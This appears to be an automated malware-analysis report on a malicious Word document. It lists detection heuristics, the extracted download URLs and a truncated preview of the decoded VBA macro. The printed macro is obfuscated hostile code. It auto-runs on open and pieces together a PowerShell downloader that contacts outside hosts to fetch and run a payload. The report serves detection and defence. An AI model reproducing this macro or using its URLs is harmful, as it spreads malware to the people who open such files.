Malware Insights
The sample contains a VBA macro that utilizes the AutoOpen function, a common technique for automatic execution upon opening the document. The macro employs the Shell() function to download and execute a payload from a suspicious URL. The reconstructed URL from the script is "http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs/,http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs", which is included as an IOC. The presence of the Shell() call and the obfuscated URL strongly indicate downloader or dropper functionality.
Heuristics (6)
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY: OLE file is 174,708 bytes but its declared streams total only 24,487 bytes — 150,221 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs (in document text, OLE body)
  - URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ba6770ba6c7819602dde8c55421ec25e9ccb98ccc917353d7bc5070ac8fbd538) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 88974 bytes |
Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sNPLAJluI"
Function EBbQYTqvXqz()
ZZuoTzUiKsP = Array(StrReverse("dDnKZODmABkTBK"), StrReverse("ScHNEaK"), StrReverse("wZzDWhFOOU"), StrReverse("UUcrRXYSadqbVX"), StrReverse("wROPpYSio"), StrReverse("cLhFunVzHqhp"), StrReverse("pqfHkrHwbfDj"), StrReverse("zwfVBlnGoMqNf"))
JRODYW = Mid("0dwd5JP1n85sjfiZEzNHO)(((g0Y &((ge'+'T-VARIabLE hs2*mDR*hs2'+').nAME[3g0Y+g0Y,11,'+'2]-JOi'+'nhs2hs2)((h'+'s2HBhs2+g0Y+g0Yhs2Efhs2+hs2rg0Y+g0Yhs2+hs2anhs2+hs2c ='+' new-hs2+hs2objehs2+hs2ct System.Nhs2+hs2etE5r", 22, 186)
zwqZjdn = Array(StrReverse("USUAKLjmCVMRcw"), StrReverse("cjwYEUnXMbch"), StrReverse("mWqbRCbSqtwY"), StrReverse("cZiODMftAt"), StrReverse("AlbhvIZiiwzj"), StrReverse("lAZUUmqwzkr"), StrReverse("tzXPBrmcF"), StrReverse("fauXiUQuVdt"))
FEkbuWT = Array(StrReverse("UbOhkIjZZJRir"), StrReverse("lBfdVGoXUlow"), StrReverse("fAdouEB"), StrReverse("XNzTbHaZVETu"), StrReverse("UnjNrZBz"), StrReverse("ctoGBYvV"), StrReverse("iptOoiKuwN"), StrReverse("zhVBuKNzbCiApP"))
CpIwb = Array(StrReverse("XkIzvoBfish"), StrReverse("vumsOhXjJEGs"), StrReverse("GAIEmjSVk"), StrReverse("sHuSIlkzcG"), StrReverse("svuhljIQ"), StrReverse("SdQipotbsM"), StrReverse("OLXtlTPPw"), StrReverse("FdmFNFNWBw"))
wiwRrqCTMzE = Mid("jtuaY+g0Y2+hs2'+'tp://wwwhs2+hsg0Y+g0Y2.loza.zp.ua/'+'R/,http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs", 5, 108)
fjosHj = Array(StrReverse("EiUGBdzhoENF"), StrReverse("wCzanAIuXmLqLz"), StrReverse("UzpEzDdfZsLTzA"), StrReverse("whFNzYEEMoH"), StrReverse("jrJPqfFMpPIGv"), StrReverse("XYhbjJurqd"), StrReverse("zwVQudPsNznP"), StrReverse("VntoqhZzRfA"))
zHAZXIlFF = Array(StrReverse("EOEOrMdT"), StrReverse("IHQrvhYBwRUsS"), StrReverse("NAdcbjfEqPEKwS"), StrReverse("tHlvFQwNvKj"), StrReverse("MajcRlRrONj"), StrReverse("kNEQAml"), StrReverse("GVCJizMhPmiR"), StrReverse("CSdHnmYfaQjXiK"))
PiFiUNBKXQi = Array(StrReverse("kHZSjHiqBt"), StrReverse("luhEmzf"), StrReverse("WiPzhZzjN"), StrReverse("jHTVhdmcmt"), StrReverse("WcUiQzU"), StrReverse("biWBJosVKrs"), StrReverse("aUWRmiPMDRKK"), StrReverse("NABuPRbdElpN"))
DzaZsRs = Mid("K3EB7zvEsaPJpUiwlhs2ite-hosg0Y+g0Yt HBE_.hs2+h'+'s2Excehs2+hs2pths2+hs2ion.Messahzd4DiWjURvPpqUD", 18, 63)
DSwmnHBVwt = Array(StrReverse("LiMIZwZqYZtUZ"), StrReverse("bbiSIiuaIMAN"), StrReverse("fFVmAnU"), StrReverse("hZaswcbEhu"), StrReverse("wvzoBFacz"), StrReverse("ZAHMqulDntjE"), StrReverse("uCEZKFTVb"), StrReverse("iOJjQTjZL"))
VsACbsFksE = Array(StrReverse("JhpIckt"), StrReverse("cCGCwihH"), StrReverse("KULPworaua"), StrReverse("EWijEfYiW"), StrReverse("paRakwusTitVib"), StrReverse("CrNtzihJcG"), StrReverse("TawQJzl"), StrReverse("UuuoMqwibrW"))
lAHjXLTDWvi = Array(StrReverse("QtYqvsuZLF"), StrReverse("sDqtzASzFWvE"), StrReverse("wmmIlbiTiK"), StrReverse("wAVmGiA"), StrReverse("HvImzjoE"), StrReverse("iRBVozuJGlokX"), StrReverse("OsnvzfjtX"), StrReverse("lzdnAoczWo"))
sukiYSjsqv = Mid("3nbrG9fjkb8Ofv3OvLhs2g0Y+g0Y'+'+hs2ghs2+hs2e;}}hs2)'+'g0'+'Y+g0Y.repLAcE(hs2LYjhs'+'2,h1ufMzNQwqh", 19, 69)
vTkBYV = Array(StrReverse("sGKCoLoZMHQo"), StrReverse("iiUuDYukzH"), StrReverse("HCBDAzGRFXN"), StrReverse("PwbwLLSN"), StrReverse("GUhLcoXSczs"), StrReverse("jumKlYMBwiwQRE"), StrReverse("baiYhtzBiTrYLi"), StrReverse("cZVMjBpoZnFLiX"))
VARrwOQcO = Array(StrReverse("MJhJAbdAzMZjd"), StrReverse("tJloZNlujjqWGI"), StrReverse("JrNidBjGl"), StrReverse("DCtaILOAsHfrIw"), StrReverse("DSczSdUUjoV"), StrReverse("AzsKCzpV"), StrReverse("sUXXcWNB"), StrReverse("RiQHajGJTVii"))
fqOwmdrd = Array(StrReverse("vWLaOQBAlUhiAf"), StrReverse("CZTczQQSrYIu"), StrReverse("dHzjiioXCMh"), StrReverse("DDYDUcCZ"), StrReverse("JvwITcfETCF"), StrReverse("YXiXzzRqKz"), StrReverse("lWvNrOXwF"), StrReverse("zTLwbOFJSi"))
LsAhKNp = Mid("PDill7M0:hs2+hs2//www.xhs2+hs2n-hs2'+'+hs2-bg0Y+g0Y1hs2+hs2aedg0Y
```
... (truncated)